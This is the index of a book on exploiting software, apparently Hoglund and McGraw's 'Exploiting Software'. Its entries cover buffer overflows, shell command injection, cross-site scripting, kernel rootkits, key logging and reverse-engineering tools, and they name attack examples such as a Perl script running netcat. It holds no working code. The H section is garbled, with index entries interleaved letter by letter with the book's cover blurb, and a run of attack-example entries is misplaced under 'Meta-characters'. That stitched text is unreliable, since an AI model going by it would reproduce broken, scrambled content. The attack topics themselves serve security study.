  buffer overflow in 2nd
  for reverse engineering
  mapping 2nd 3rd
  tracing
API monitors for injection points 2nd
API SPY tool
Application security vs. software security
Application Service Provider (ASP) model of software licensing
Applications
  vs. operating systems
Applying attack patterns 2nd 3rd 4th 5th
Architectural flaw 2nd 3rd
Arguments
  expansion of, buffer overflow from
  in shell command injection
Arithmetic
  address-based 2nd
  buffer overflow from 2nd 3rd 4th 5th 6th
ARP (address resolution protocol)
  cache poisoning attacks in
  packet leaking in 2nd
ARPANET
asp dot bug
ASP pages, embedding Perl within
Association De Malfaiteurs (ADM)
Assumptions
  in attack patterns 2nd
  undermining
at utility
ATMEL 93C46 chips
Attaching to running processes 2nd
Attack examples
  adding a user with injection
  address-based arithmetic problem
  alchemy eye network management software file system
  alternate encoding triple dot in SpoonFTP
  alternate encoding with ghost characters in FTP and Web servers
  Apache HTTPD cookie buffer overflow
  Baltimore Technologies MailSweeper
  breaking Oracle 9i with a socket attack
  buffer overflow in Internet Explorer 4.0 via EMBED tags
  buffer overflow in TERM
  buffer overflow on a Cisco router running on a Motorola CPU
  buffer overflow in $HOME
  building binary files using debug.exe with injection
  building text files with injection
  C5 clear forward and seize in-band attack
  Cold Fusion CFEXECUTE argument injection
  combined encodings in CesarFTP
  defined
  dotless IP addresses in Internet Explorer
  EasyNews PHP script XSS
  embedded Perl script that calls system() to execute netcat
  embedded Perl script within ASP
  embedded script in nonscript element from GNU mailman XSS
  entrust and injection
  escaped slashes in alternate encodings
  Excel host() function
  executable fonts
  file traversal, query string, and GroupWise
  file traversal, query string, and Hsphere
  filter failure in Taylor UUCP daemon
  FTP glob()
  Horde IMP
  Hotmail Java tag filtering
  HPUX passwd
  HTTP headers in webalizer XSS
  Informix database file system injection
  injection and FTP
  injection and remote xterms
  injection and Tiny FTP (TFTP)
  IPSwitch Imail, blind trusted mailbox name
  ixsso.query ActiveX object
  Javascript alert dialog XSS
  keyboard buffer injection
  Libc in FreeBSD
  local filenames and the ActiveX preloader
  the Internet Explorer GetObject() call
Attack patterns 2nd
  alternate encoding of leading ghost characters
  alternative IP addresses
  API calls for buffer overflow
  applying 2nd 3rd 4th 5th
  argument injection
  attacker viewpoint 2nd
  binary resource files
  blueprints for disaster 2nd 3rd
  boxes
  C++ compiler example 2nd 3rd 4th 5th 6th 7th 8th 9th
  choosing
  client invisibility
  client side injection and buffer overflow
  command delimiters
  configuration files
    for search paths
    to run command to elevated privilege
  content-based file system function injection
  defined
  direct access to executable files
  embedding scripts
    in nonscript elements
    within script
  environment variables
    for buffer overflow
    manipulating
  escaped slashes in alternate encoding
  executable code in nonexecutable files
  filter failure through buffer overflow
  global variables
  HTTP cookies
  HTTP query strings
  in-band switching signals
  local command-line utilities for buffer overflow
  local filenames passed to functions expecting URLs
  lock picks
  meta-characters in e-mail headers
  MIME conversion
  multiple parsers and double escapes
  open-systems view 2nd 3rd 4th 5th 6th
  parameter expansion
  postfix NULL terminators
  programs writing to privileged OS resources
  relative path traversal
  session IDs, resource IDs, and blind trusts
  simple script injection
  slashes in alternate encoding 2nd
  string format overflow in syslog
  taxonomy of 2nd 3rd 4th
  trust in 2nd
  unicode encoding
  URL encoding 2nd
  user-controlled filenames
  user-supplied variables passed to file system calls
  UTF-8 encoding
  variable and tag overflow
  web logs
  web server misclassification
  XSS in HTTP headers
Attack signatures 2nd 3rd
Attacker
  defined 2nd
  hiding identity of 2nd
  in attack patterns 2nd
  intention
  viewpoint
Audit logs
  poisoning 2nd
  truncation of
Auditing
  automatic and bulky 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
  for directly executable files
  humans best at
Authentication
  multiple paths of
  session
Automated attacks
Automatic auditing 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
AUTORUN.INF file 2nd

[B]

Babbage, Charles
Backdoors
  from worms
  history of
  in attack patterns
  in flash ROM
  in outsourced software
  on TFTP
  on X Windows
  prevalence of
Backslashes (\)
  for null terminators
  in alternate encoding 2nd 3rd
  in shell command injection
Backtracing 2nd 3rd
Backwash attacks
Bad software 2nd
Bad Software (Kaner and Pels)
Baggage handling systems
Banks, attacks on
Batch analysis with IDA-Pro 2nd 3rd 4th 5th 6th 7th 8th
be instruction
BGP (Border Gateway Protocol) handlers
Big endian byte ordering
  in MIPS processors
  vs. little endian
Binary files
  overflow in 2nd
  patching 2nd
    NT kernel 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
    peephole patches 2nd 3rd
  shell command injection for 2nd 3rd
Binary flags for state
BIND, buffer overflows in
Biological defense models
BIOS memory
Black box analysis
  for reverse engineering 2nd
  limitations of
  vs. white box analysis
Black lists
  for input
  vs. white lists 2nd
Black Hat security conference
Blaster worm
Blind trust 2nd
bltzal instruction
Blue boxes 2nd 3rd
Blueprints for disaster 2nd 3rd
bnel instruction
Boot disk attacks
Border Gateway Protocol (BGP) handlers
Boron tags
  checking for 2nd
  for security
  in buffer overflow
  in code tracing
Branch delay
Branches
  in AIX/PowerPC 2nd
  on PA-RISC 2nd
Bray, Brandon
Breakpoints
  for input path tracing 2nd
  in reverse engineering 2nd 3rd 4th
  in runtime tracing 2nd
  memory page
Browsing directories 2nd
Brute forcing session IDs
BSD distribution, arithmetic problems in 2nd
Buffer overflow 2nd 3rd 4th
  audit truncation and filters with
  content-based 2nd 3rd
  from arithmetic errors 2nd 3rd 4th 5th 6th
  from environment variables 2nd 3rd
  from format strings 2nd 3rd 4th 5th 6th 7th
  from multiple operations
  from parameter expansion
  gets for
  heap overflows 2nd 3rd 4th 5th
  in BIND
  in C++ 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
  in client software 2nd 3rd
  in databases 2nd
  in domain name servers
  in embedded systems 2nd 3rd 4th
  in helpctr.exe 2nd 3rd 4th 5th
  in Java 2nd 3rd
  injection vectors in 2nd 3rd 4th 5th 6th
  kernel
  payloads in 2nd 3rd 4th 5th 6th 7th 8th
  potential sources 2nd 3rd
  Prolog/Epilog code for 2nd 3rd 4th 5th 6th
  security checks for
  stack overflow 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th
  state corruption in 2nd
  trampolining with [See Trampoline attack]
  two-stage 2nd
Buffers
  keyboard, character injection in
  shared, leaking data in 2nd 3rd
  tracing
Bug instantiations
Bugs
  defined
  in open-systems view
  per thousand lines of code 2nd 3rd
  reports and fixes, as vulnerability sources
Bugtraq mailing list
Building Secure Software (Viega and McGraw) 2nd 3rd 4th 5th 6th
Bulk auditing 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
bulk_audit_sprintf.idc script 2nd 3rd 4th 5th
Burning out hardware
Business software
bv instruction
Byte code disassemblers
Byte operations
  in reversing parser code 2nd
  with pointers




[C]

C and C++ language
  buffer overflow in
  escape codes in
  exploit example 2nd 3rd 4th 5th 6th 7th 8th 9th
  for Java 2nd
  string handling routines in
  vtables
C5 (CCITT-5) signaling system 2nd
Call hooking
  for backtracing 2nd 3rd
  for hiding processes
  for redirection
  for removing process records 2nd 3rd 4th
  IDTs
  structure of 2nd
  system calls
Call stacks for dead ends and runouts
Call throughs, registers for
can_read function 2nd
Canary values 2nd 3rd
  defeating
  for buffer overflow attacks 2nd
Car engine control codes
Carriage returns in shell command injection
Cascade interrupt
Categories of subversive code
CCITT-5 (C5) signaling system 2nd
CD-ROM images 2nd
Cellular phones
CesarFTP server
CFEXECUTE tag
CFI (Common Flash Interface) for chip detection 2nd
cgi programs
  misclassification with
  with Web servers
Chaos theory
Character conversions
  in equivalent requests 2nd 3rd 4th
  in reversing parser code
Character injection 2nd 3rd
Character sets, hostile
Chat clients for backtrace code 2nd
check_boron function 2nd
check_password function
check_target_for_string function 2nd 3rd
Checked build environment
Checksums for payloads 2nd
Chipping cars
Chips, detecting 2nd 3rd 4th
CIH virus 2nd 3rd 4th 5th 6th
Cisco routers, buffer overflow in 2nd
Classification
  in attacks 2nd
  of subversive code
Client software 2nd
  assumptions in 2nd
  buffer overflows on 2nd 3rd
  content-based attacks on 2nd
  cross-site scripting 2nd 3rd 4th 5th
  database honeypots in 2nd 3rd
  in-band signals for 2nd 3rd 4th 5th 6th 7th 8th
  invisibility of scripts and malicious code with 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
  server control of 2nd
Code address targets for injection vectors 2nd
Code coverage
  for reverse engineering 2nd
  in runtime tracing
  tools for 2nd 3rd 4th 5th 6th 7th
Code paths in FTP servers 2nd
Code Red worm 2nd
Code tracing 2nd 3rd
  API calls
  backtracing 2nd 3rd
  boron tagging in
  buffers
  dead ends and runouts in
  in server software 2nd 3rd 4th 5th 6th
  leapfrogging in 2nd
  memory page breakpoints in
  program execution flow 2nd
  runtime 2nd
Code-signing errors in Java
Cold Fusion, CFEXECUTE injection in
Combined attacks with equivalent requests 2nd
Command and control activities
Command-line parameters
  for executable files
  for setuid
Commands and command lines
  buffer overflow from 2nd 3rd
  delimiters in 2nd 3rd
  in input
  in JVMs
  injecting [See Shell command injection]
  separators in
Commercial systems, embedded systems in
Common Flash Interface (CFI) for chip detection 2nd
Common Runtime Language (CRL)
Communications systems
  embedded systems in
  in software
COMP.RISKS mailing list
Compiler flaw 2nd 3rd 4th 5th 6th 7th 8th 9th
Complex computational systems
Complexity
  of computer models
  of software 2nd
Component-based software
  future of
  logically distributed systems for
Components in attack patterns 2nd
Computation, future of 2nd
Computer science theory 2nd
Computer Security Institute (CSI) survey
Computer-Related Risks (Neumann)
Concept virus
Conditional branches, code coverage tools for 2nd
Configuration files
  for elevated privilege
  search paths in
  server software trust in 2nd 3rd 4th 5th
Connectivity of software 2nd
Content-based attacks
  buffer overflow 2nd 3rd
  on client software 2nd
Contexts for threads 2nd
continue command
Contract software
  backdoors in
  future of 2nd
Control codes
  for client software 2nd
  for terminals 2nd
Controller chips, keyboard
Conversions
  ASCII chart 2nd 3rd
  character 2nd 3rd 4th 5th
  MIME
Cookies
  for session IDs
  overflow in 2nd
Coprocessor interrupt
Copy protection schemes
  and reverse engineering
  decompiling
Copyright law
Copyright mechanisms, patching
Corrupting
  log files
  states 2nd
Covert communication
Cowan, Crispin 2nd 3rd
CPU registers
  examining 2nd
  for boron tags 2nd
  in injection vectors 2nd
  in MIPS
  in SPARC
Cracking tools
Crafted input 2nd 3rd
  audit poisoning with 2nd
  code tracing for 2nd 3rd 4th 5th 6th 7th
  defending against 2nd
  equivalent requests in [See Equivalent input and requests]
  filters for 2nd
  IDSs for 2nd 3rd 4th 5th
  misclassification in 2nd
  partition analysis in 2nd 3rd
  reversing parser code 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
CreateFile function
Cross-site scripting [See XSS (cross-site scripting)]
CRT_INIT function
Cryptography in geographically distributed systems
Cryptotrojan attacks
CSI (Computer Security Institute) survey
CVE vulnerabilities catalog
CWD (Current Working Directory)
  for servers
  redirection with
CyberCop tool




[D]

Damage potential in open-systems view 2nd
Data blocks in injection vectors
Data bombs
Data chains, character conversion in
Data collection by subversive code
Data encryption algorithms, publishing
Data files, buffer overflow in 2nd 3rd
Data leaking in shared buffers 2nd 3rd
Data sections for payloads 2nd
Database buffer overflows 2nd
Dead ends in code tracing
Dead listings for input path tracing
Debug logs for helpctr.exe
debug.exe program 2nd 3rd
Debugging and debuggers
  for binary file building 2nd 3rd
  for reverse engineering 2nd 3rd 4th 5th
  multithreading programs 2nd 3rd 4th
  rootkits as tools for
decode function 2nd 3rd
Decompiler
Decompiling 2nd
  helpctr.exe 2nd 3rd 4th 5th
  in reverse engineering
Deferred procedure calls (DPCs)
Delay slot
Delayed coordinated embedding
Delimiters 2nd 3rd 4th
Denial-of-service problems
Denver International Airport baggage handling system
Design-level vulnerabilities 2nd
Destination buffers in helpctr.exe 2nd 3rd
Desynchronization of packets 2nd
Detecting
  chips 2nd 3rd 4th
  code problems
  rootkits
Developing Windows NT Device Drivers (Dekker and Newcomer)
Device drivers [See Drivers]
DialogProc function
Digital Millennium Copyright Act (DMCA) 2nd
Digital rights management, limitations of
Digital tradecraft 2nd 3rd
Dir command
Direct access to executable files 2nd
Directories
  browsing 2nd
  hiding 2nd 3rd
  permissions on
  redirecting
Disabling Windows system file protection
Disasm function
Disassembly 2nd 3rd
  for buffer overflow 2nd
  in reverse engineering 2nd 3rd
Discriminator digits in phone systems
Disk access, rootkits for 2nd
Disk controller interrupt
Distributed systems 2nd
Diversions by IDSs
DLL files and fonts
  buffer overflows from
DMCA (Digital Millennium Copyright Act) 2nd
Domain name servers (DNS)
  buffer overflows in
  in attack patterns
  in shell command injection
Dotless IP addresses
Double escapes in shell command injection
DPCs (deferred procedure calls)
Dr. Watson log file
Dr. Watson utility 2nd
DrainOutputBuffer function 2nd
DrawGLScene function
Drip-scans
DriverEntry function 2nd 3rd 4th 5th 6th 7th
Drivers
  filter 2nd
  for kernel rootkits 2nd 3rd 4th 5th 6th 7th 8th
  for Trojan executable redirection 2nd 3rd 4th 5th 6th
  in reverse engineering
  network support for 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
  programs using 2nd
  registering 2nd 3rd
  structure of 2nd
  unloadable 2nd
Dumb terminals
dumpbin utility
Dumping memory 2nd
Dynamic execution pointing for redirection
Dynamic jump tables for payloads 2nd
dyninstAPI tool


[E]

E-mail attachments
E-mail injection 2nd 3rd 4th
ea_t types
EasyNews scripts
echo command
Economic threats
EEPROM chips 2nd
  burning out hardware
  enabling read and write from
  in Ethernet cards 2nd 3rd 4th
  manufacturers of
  serial vs. parallel 2nd
  timing in
Effective addresses, structure for
EFTP server, overflow in
Electronic warfare
Elevated privilege problem 2nd 3rd 4th
elitewrap program
EMBED tags
Embedded scripts 2nd
Embedded systems
  buffer overflows in 2nd 3rd 4th
  future of 2nd
  in cellular phones
Emergent computation
Encapsulation
  future of 2nd
  of OSs
Encryption algorithms, publishing
End-user license agreements (EULAs)
Engine control code
Enumerating threads and processes 2nd
EnumSubKeys function 2nd 3rd 4th
Environment variables
  buffer overflow in 2nd 3rd
  in server software 2nd 3rd 4th
Environmental effects 2nd 3rd
Equivalent input and requests
  API layer mapping for 2nd 3rd
  character conversion in 2nd 3rd 4th
  combined attacks in 2nd
  ghost characters in 2nd 3rd
  meta-characters in 2nd 3rd 4th
  on IDSs 2nd
Error code checking in server software
Error handling and recovery systems 2nd
Escape codes
  in alternate encoding
  in API calls
  in log files
  in shell command injection 2nd
  meta-characters with in-band signaling 2nd 3rd 4th
Espionage 2nd 3rd
Ethernet cards, EEPROM in 2nd 3rd 4th
Ethernet scrubbing problem 2nd
EULAs (end-user license agreements)
Excel, host function in
Exception handling
  for buffer overflow
  overwriting frames for
exec function
Executable code and files
  direct access to 2nd
  in nonexecutable files
  in WINNT 2nd
  single stepping for 2nd
  vs. source code
execv function
Exim, overflow in
Existing code in injection vectors
Exploit, defined
Exploits in attack patterns 2nd
Exposure in open systems 2nd
Expressions
  for input path tracing 2nd
  in shell command injection
Extensibility of software 2nd 3rd 4th
External branch instructions on PA-RISC
External input in software 2nd 3rd


[F]

F00F bug
Failure recovery systems
Failure Simulation Tool (FST) 2nd
False positives in white box analysis
Fault injection 2nd 3rd
Fault-tolerant systems
Faults, leveraging
Feedback events
Felten, Ed 2nd 3rd
Fenris tool 2nd
File handles for drivers
File streams specifier, misclassification in
File systems 2nd
  Alchemy Eye Network 2nd
  directory browsing 2nd
  filenames in
  Informix Database
  injection attacks on 2nd
  traversal in 2nd
  user-supplied variables passed to
File Transfer Protocol (FTP) servers
  attacks on
  buffer overflow in
  code paths in 2nd
  ghost characters with
filemon tool
Filenames
  URLs replaced by 2nd
  XSS in
Files
  controllable
  hiding 2nd 3rd
FileSystemObject, attacks on
Filters
  drivers for 2nd
  for commands
  for input 2nd
  for server software input
  in IDSs
  in parsing
  in shell command injection
  with buffer overflow
Financial threats
Firewalls
  as reactive technology
  for port scans
  limitations of
Firewalls and Internet Security (Cheswick, Bellovin, and Rubin)
Firmware exploitation
First parallel port interrupt
First serial port interrupt
Fixed-size buffers in stack overflow 2nd
Flash RAM, detecting
Flash ROM 2nd
Flaws
  defined
  in open-systems view
Floating point unit interrupt
flog function
Floppy disk controller interrupt
Fluttering windows
FML mailing list archive 2nd
FnDebugDispatch function 2nd
Fonts, executable
fOpenThread function
Forking processes
Format string vulnerabilities 2nd 3rd 4th 5th 6th 7th
Formatting poison pills
Forms, trust assumptions in
Forwards, injection with
FoundScan tool
Fragmentation of packets
fread function
Free build environments
free function
FreeBSD distribution
  address-based arithmetic in 2nd
  buffer overflow in
freedom to tinker site
FS register
FST (Failure Simulation Tool) 2nd
FTP (File Transfer Protocol) servers
  attacks on
  buffer overflow in
  code paths in 2nd
  ghost characters with
Function call nesting
Function return addresses in buffer overflow attacks
Future of software
  long-term 2nd 3rd
  medium-term 2nd 3rd
  short-term 2nd 3rd 4th 5th
  threads in
fwrite function


[G]

Gates
GDB tool 2nd 3rd 4th 5th 6th
General problems
General registers in SPARC
Generic rules in injection vectors
Geographically distributed systems
Geopolitics in indirection
GET requests
  in PHP
  segmented
get_func_qty function
get_user_defined_prefix function 2nd
getFilenameDialog function 2nd
getn_func function
GetObject function 2nd
getopt function
GetProcAddress function
gets function
Ghost characters 2nd 3rd
glob function
Global offset table (GOT) pointers
Global variables
  in buffer overflow attacks
  in PHP 2nd 3rd
GlobalAlloc function
GNU Mailman, embedded scripts in
GOT (global offset table) pointers
Graphing software
  for reverse engineering
  phase space analysis 2nd 3rd 4th
Gray box analysis
  for input path tracing
  for reverse engineering 2nd 3rd
  on Microsoft SQL Server 2nd 3rd
grep tool
GroupWise, file traversal in

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Hackers def ined Hackin g Expo sed (McClure, Scam bray , and Kurt z) 2nd 3rd 4t h 5t h Hailst orm too l 2nd 3rd Han dle inh eritan ce Har ion calls for payloads • d-coded fu nctTable of Content s Har 2nd 3rd • dware v irusesI ndex burn in g oSoftw ut h ardware Expl oit ing a re How to Br e ak Code chip det ect ion 2nd 3rd 4t h By Gr eg Hoglund , Gar y McGr aw CI H 2nd 3rd 4t h 5t h EEPROM in Pub er: Addison enlish abling read/ writWesley e f rom Pub Dat e: February Et hernet cards 2nd17, 3rd200 4t h4 man I SBN: uf act0urers 20 1-of 786 95 -8 ser ia l vs.51 parallel 2nd Pages: 2 rea din g a nd writin g h ardware mem ory 2nd 3rd 4t h 5t h 6t h 7t h 8t h Hash loa din g f or payloads 2nd Hay es modem pro tocol, reflect ion problem with Headers e- mail 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are for mem ory block s 2nd 3rd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Heap ov er flows 2nd 3rd 4t h 5t h 6t h What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. HeapFree f un ct ion 2nd

helpct r. exe, rev ersing 2nd 3rd 4t h 5t h

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Hidin g t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ack er iden t ity 2nd at t att ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . files an d direct ories 2nd 3rd processes This m ust - h ave

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he s scr root ipt kit k idprogram die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t sto rage f iles High -pot ency at t acks in open- sy st em s view

Why sof t w ar e High land addresses

ex ploit w ill con t inue t o be a ser ious p r oblem

Hist ory of sof twar e 2nd 3rd 4t h

When net Holling swort h, Jef f w or k

secur it y m ech anisms do n ot w or k

Holodeck to ol

At t ackment patvariable t er ns HOME environ Hon eypo ts 2nd 3rd

Rev er se engineer in g

Hoo kin g [ See Call h ooking]

Hor de I MP, in ject ion wit h 2nd

Classic at t acks ag ainst serv er soft w ar e

host fu nct ion

Host- based fau lt inj ect or s

Sur pr ising at t acks ag ainst clien t soft war e

Hostile charact er sets Hostile Tech stat emniqu en t set ess f or

cr aft ing m aliciou s inpu t

HOSTNAME env iron ment va riable Hot fix es The

t echn ical det ails of b uf fer ov er f low s

Hot m ail, inj ect ion wit h Hou se of Root logick it s Howa rd, Mich ael 2nd

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak HPUX softbuf w fer ar e. o verf low in self -decrypt ing payloads on 2nd 3rd HSph ere, f ile t rav er sal in HTML escape codes for in ject ion wit h max size at t ribu te in HTTP cookies in 2nd

headers in query st rin gs in 2nd hu nt _a ddress f un ct ion 2nd 3rd 4t h 5t h




I

I LOVE YOU virus 2nd 3rd
I-Planet Server, decompiling 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
IceCast MP3 Server, URL encoding in
ID mode for chip detection 2nd 3rd
IDA (Interactive Disassembler)
    batch analysis with 2nd 3rd 4th 5th 6th 7th 8th
    for decompiling 2nd
    for input path tracing
    for mapping runtime memory addresses
    for partition analysis
    for signed/unsigned mismatches 2nd
    for white box analysis
    plugins for 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th 13th
    tracking work with
IDC scripts 2nd 3rd 4th 5th 6th 7th 8th
IDE channel interrupts 2nd
Identity, hiding 2nd
IDSs (intrusion detection systems)
    alternate encodings with 2nd
    as reactive subscription services 2nd
    signature-based vs. anomaly-based 2nd
    signatures in
IDTs (Interrupt Descriptor Tables), hooking
IDv3 tags
IIS Server
    elevated privileges in
    unicode encodings in
ILoveYou virus 2nd 3rd
Implicit trust assumption
In instruction
In registers in SPARC
In-band signals
    C5 attack example 2nd
    for character injection 2nd 3rd
    history of 2nd
    in cross-site scripting 2nd 3rd 4th 5th
    reflection with
    uses of 2nd
    with printers 2nd
include function
Indirection in attack patterns 2nd
info command 2nd
info reg command 2nd
Information warfare (IW) 2nd 3rd 4th
Informix Database
Inheritance, permission
init function
Injection
    character 2nd 3rd
    command [See Shell command injection]
    e-mail 2nd 3rd 4th
    on file systems 2nd
Injection points 2nd
Injection vectors 2nd
    code address targets for 2nd
    existing code in
    in attack patterns 2nd
    number representation in
    registers in 2nd
Input files, finding
Input tracing
    in reverse engineering 2nd
    in server software 2nd 3rd 4th 5th 6th
Input/output request packets (IRPs)
Inputs
    crafted [See Crafted input]
    in black box analysis
    in open-systems view
    in partition analysis
Inside-out breakpoints
Instruction pointers
    in MIPS processors 2nd
    injection vectors with 2nd 3rd
Intel interrupt request architecture 2nd 3rd
Intellectual property laws
Intelligence gathering 2nd 3rd
Intelligent devices
Inter-space branching 2nd
Inter-space trampolines
Interactive Disassembler [See IDA (Interactive Disassembler)]
Interactive shells 2nd
Internal states
    in software 2nd
    mapping 2nd
Internet
    adoption rate of
    connectivity with [See Connectivity]
    security on
Internet Explorer
    content-based attacks on
    dotless IP addresses in
    GetObject call in 2nd
Internet toaster
Interrupt Descriptor Tables (IDTs), hooking
Interrupt request (IRQ) architecture 2nd 3rd
Interrupts
    IDT hooking
    IRQ architecture 2nd 3rd
    Programmable Interrupt Controllers 2nd
Intrusion Detection Systems (IDSs)
    alternate encodings with 2nd
    as reactive subscription services 2nd
    failures of
    signature-based vs. anomaly-based 2nd
    signatures in
Invisibility of clients
Inward operators
IP addresses
    alternative
    in attack patterns
IPSwitch Imail, blind trusts in
IRC.DLL for backtrace code 2nd
IRPs (input/output request packets)
IRQ (interrupt request) architecture 2nd 3rd
ISO9660 file system
ITS4 program
IXIA tool
ixsso.query object




J

Java
    and .NET 2nd
    buffer overflow in 2nd 3rd
    byte code disassemblers for
    extensibility of
    security [See Security, Java]
Java Virtual Machine (JVM)
    buffer overflows in 2nd 3rd
    encapsulation of
    extensibility of
Javascript, alert dialog attack in
JEDEC ID mode 2nd 3rd
jedec_read_id function
jedec_read_mfr function
jedec_reset function


K

KeCancelTimer function
Kernel
    buffer overflows in
    reverse engineering in
    infecting images of
    modifying
    patching 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
Kernel rootkits 2nd
    building
    checked build environment for
    drivers for 2nd 3rd 4th 5th 6th 7th 8th
    files for
    writing
Kernel-mode debugger
KERNEL32.DLL
KeSetTimerEx function
KeStallExecutionProcessor function
Key logging 2nd
Keyboard buffer injection
Keyboards
    controller chips for
    interrupts for 2nd
    reading and writing to 2nd 3rd 4th 5th 6th 7th
Keystroke monitors
KLOC (thousand lines of code) in bug rates 2nd 3rd
Knowledge-driven models

L

Language-based attacks
LD_LIBRARY_PATH environment variable 2nd
ldil instruction
ldo instruction 2nd 3rd
Leading ghost characters
Leaf functions 2nd
Leaking data in shared buffers 2nd 3rd
Leapfrogging in code tracing 2nd
LED keyboard indicators 2nd 3rd 4th 5th 6th 7th
Legality of reverse engineering 2nd 3rd
Leveraging faults
li instruction
libc module
Licensing
    and reverse engineering
    ASP model of
Linkage on PA-RISC
Linux
    key loggers in
    terminal character injection in 2nd
Litchfield, David
Little-endian byte ordering
    in MIPS processors
    vs. big endian
load_file function 2nd
Loadable kernel modules (lkms)
LoadLibrary function
Local branch instructions on PA-RISC
Local calls, weak 2nd 3rd 4th 5th
Local command-line utilities 2nd
Local filenames, URLs replaced by 2nd
Local registers in SPARC
Local sockets 2nd
Location-based computation 2nd
Lock picks
Log files
    corrupting
    for server software
    manipulating 2nd
    overflow in
    privileges for 2nd
Logging, key 2nd
Logic bombs
Logical program flow
Logically distributed systems
Long-term future of software
Love Bug virus
Lovelace, Ada 2nd
Low-level disk access 2nd
Lowland addresses
lr register in AIX/PowerPC
ls command
lsof command
lstrcpy function
    finding in reverse engineering
ltrace tool
Lunt, Teresa




M

Machine code disassemblers 2nd 3rd
Mailing lists
MailSweeper, injection with
Malicious input, crafting [See Crafted input]
malloc function 2nd
Managed-writable mechanism
Manufacturers, EEPROM
Mapping
    API layer 2nd 3rd
    internal states 2nd
    memory 2nd 3rd
    network
    runtime memory addresses
Mars Lander
Master boot record (MBR), reading and writing
maxsize attribute
Measurement in reverse engineering
Medium-term future of software 2nd 3rd
Melissa virus
memcpy function
Memory
    buffer overflows in [See Buffer overflow]
    dumping 2nd
    hardware, reading and writing 2nd 3rd 4th 5th 6th 7th 8th
    in reverse engineering 2nd
    management of 2nd 3rd 4th 5th 6th
    process snapshots for 2nd 3rd 4th 5th 6th
    writing to
Memory mapping
    for Trojan files 2nd 3rd
    runtime
Memory page breakpoints
Message pumps
Meta-characters
    in e-mail headers 2nd
    in equivalent requests 2nd 3rd 4th
    in parsing
    meta-characters and the FML mailing list archive
    microsoft Outlook view control
    misclassification in NTFS file streams specifier
    mples: Internet Explorer 2nd
    Outlook XP and HTML on reply or forward
    overflow binary resource file in Netscape
    overflow variables and tags in Exim
    overflow variables and tags in MidiPlug
    overflow with symbolic links in EFTP server
    PHP command injection using delimiters
    PHP global variables
    PostNuke content management system
    scheduling a process with XSS injection
    Scripting.FileSystemObject
    Scriptlet.TypeLib
    Sendmail overflow
    simple script injection
    slashes in alternate encodings
    Solaris getopt
    Syslog()
    the Outlook application object
    Unicode encodings in the IIS server
    UNIX environment variable
    URL encodings in IceCast MP3 server
    URL encodings in Titan application firewall
    Wscript.Network
    WScript.Shell
    XSS in MP3 files and spreadsheets
    Xtlib
mflr register




Micro machines
Microsoft compiler flaw 2nd 3rd 4th 5th 6th 7th 8th 9th
Microsoft Developer Network (MSDN)
Microsoft IIS Server
    elevated privileges in
    unicode encodings in
Microsoft operating systems, lines of code in
Microsoft SQL Server 7, gray box analysis for 2nd
MidiPlug, overflow in
Military sites
    honeypots in 2nd
    telephone system infiltration
Military systems
    aircraft 2nd
    embedded
MIME conversions
MIPS instructions 2nd
MIPS-based payload construction
Misclassification 2nd
Missile systems
Mitnick, Kevin
Mobile code 2nd 3rd 4th 5th 6th
Modeling computers
Monitor programs for injection points 2nd
Motorola CPU, buffer overflow in
Mouse interrupt
MP3 files, XSS in
MSDN (Microsoft Developer Network)
Multibyte number representation
Multiplatform payloads 2nd 3rd
Multiple operations, buffer overflow from
Multiple parsers in shell command injection
Multiple paths of authentication
Multiple-command trick
Multithreaded programs 2nd 3rd 4th
Munging data
MV-22 Osprey 2nd
MyDialogProc function 2nd


N

NASA Mars Lander
Navigation systems
NDIS library 2nd 3rd
NdisOpenAdapter function
NdisRegisterProtocol function
NdisRequest function 2nd
Negative values, buffer overflow from 2nd
Nesting function calls
net_start_root_command
net_stop_root_command
netcat program 2nd 3rd
Netscape I-Planet Application Server, decompiling 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
Netscape, overflow in
netstat command 2nd
Netterm program
Network cards
    EEPROM in 2nd 3rd 4th
    finding 2nd 3rd 4th 5th 6th
Network sniffers
    for IDSs
    for OS stack identification 2nd
Network worms
Network-based fault injectors
Network-based software
Networks
    adoption rate of 2nd
    code for
    for driver support 2nd 3rd 4th 5th 6th 7th 8th 9th 10th
    mapping
    scanning
NIDES intrusion detection system
NIMDA worm
nmap port scanner
Nonexecutable files
Nonexecutable stacks 2nd 3rd
nop instructions
    in AIX/PowerPC
    in SPARC 2nd
NOT operator
NTFS file streams specifier
NULL buffers in helpctr.exe
NULL characters and terminators
    in AIX/PowerPC
    in buffer overflow 2nd 3rd
    in MIPS opcodes 2nd
    in payloads 2nd
    in reversing parser code
    in stack overflow 2nd 3rd 4th 5th 6th 7th 8th
    postfix 2nd
Number representation in injection vectors

O

Object sharing, design-level vulnerabilities in
Objects, future of
Observability
Observable effects, removing
Off-by-one NULL termination
Oil tankers, embedded systems in
OllyDbg tool
OnOpenAdapterDone function
OnOpenAdapterOne function
OnStubDispatch function
OnUnload function
Opcodes
